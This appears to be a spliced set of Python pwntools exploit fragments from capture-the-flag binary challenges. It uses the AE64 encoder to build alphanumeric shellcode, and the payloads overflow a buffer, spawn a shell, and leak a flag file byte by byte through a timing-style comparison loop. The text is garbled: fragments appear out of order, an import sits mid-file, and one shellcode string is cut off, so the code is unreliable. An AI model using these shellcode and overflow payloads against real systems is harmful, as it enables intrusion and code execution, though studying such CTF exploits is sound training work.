def attack():
shellcode = '''
mov rsi , rcx
shl rsi , 36
shr rsi , 48
shl rsi , 12
mov rdx , 100
mov rdi , 1
mov rax , 1
syscall
'''
obj = AE64()
sc = obj.encode(asm(shellcode),'rax')
# dbg('*$rebase(0x0000000000001215)')
sla('>>',0x24)
# sa('>>','a'*0x14 + 'a'*8 + p64(0x44440000))
sa('>>' , 'a'*0x14 + p64(0) + p64(0x44440000) )
# dbg('*$rebase(0x00000000001204)')
sla('>>',sc)
# p.success(getShell())
p.interactive()
def exp(offset, ch):
code = asm("""
push 0x67616c66
mov rdi, rsp
xor edx, edx
xor esi, esi
push SYS_open
pop rax
syscall
push SYS_open
pop rax
syscall
push SYS_open
pop rax
syscall
push SYS_open
pop rax
syscall
xor eax, eax
push 6
pop rdi
push 0x50
pop rdx
mov rsi, 0x10100
syscall
mov dl, byte ptr [rsi+{}]
mov cl, {}
cmp cl, dl
jz loop
mov al,231
syscall
loop:
jmp loop
""".format(offset, ch))
obj = AE64()
sc = obj.encode(code, 'rdx')
# print sc
p.recvuntil("Are you a master of shellcode?\n")
p.send(sc)
from pwn import *
from ae64 import AE64
context.log_level = 'debug'
context.arch = 'amd64'
p = process('./example1')
obj = AE64()
sc = obj.encode(asm(shellcraft.sh()), 'r13')
p.sendline(sc)
p.interactive()
add [rsi], r15
jmp search
'''
shellcode_1 = ''' /*长度不合适*/
push 1
pop rdi
push 0x1
pop rdx
mov esi, 0x1010101
xor esi, 0x1611181
push 0x1601101
pop r14
xor r14, 0x1010101
push 0x1011101
pop r15
xor r15,0x1010101
search:
add r14, r15 /*r14: addr*/
mov [rsi], r15
mov [rsi+8], r15
push SYS_writev
pop rax
syscall
jmp search
'''
payload = AE64().encode(asm(shellcode, arch='amd64'), 'rdx')
print(payload)
#gdb.attach(io)
sn(payload)
irt()